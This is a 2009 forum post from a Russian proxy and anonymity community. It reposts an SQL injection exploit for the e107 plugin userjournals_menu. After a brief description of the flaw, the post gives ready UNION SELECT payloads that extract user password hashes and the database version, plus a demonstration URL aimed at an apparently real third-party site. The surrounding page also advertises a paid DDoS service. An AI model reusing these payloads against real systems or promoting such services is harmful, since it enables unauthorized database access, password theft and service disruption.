SQL-инъекция в e107 Plugin userjournals_menu - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 



Информация по хайдам / репутации

(РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS
Бесплатные прокси уже в Telegram
Все инфопродукты и приватная информация бесплатно
Старый 13.05.2009, 08:35   #1 (permalink)
Прокси CМ
 
Аватар для ReisendeR
 
Регистрация: 12.05.2009
Сообщений: 268
Member ID: 13
ICQ 160673

Репутация: 592
Репутация: 592
Сказал(а) спасибо: 64
Поблагодарили 427 раз(а) в 153 сообщениях
Топикстартер (автор темы) Сообщение SQL-инъекция в e107 Plugin userjournals_menu

Программа: e107 Plugin userjournals_menu

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием userjournals.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

Код:
http://localhost/plugins/userjournal...rnals.php?blog.[exploit]

-9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--

-9999 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
Демонстрация:

Код:
http://demo.infozonelab.com/plugins/...php?blog.-9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
взято с xakep.ru
__________________
[SIGPIC][/SIGPIC]
Go_Ogle - кто я о_О?)

Яндекс - найдётся всё!
Google: ничего и не терялось...
ReisendeR вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.





DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.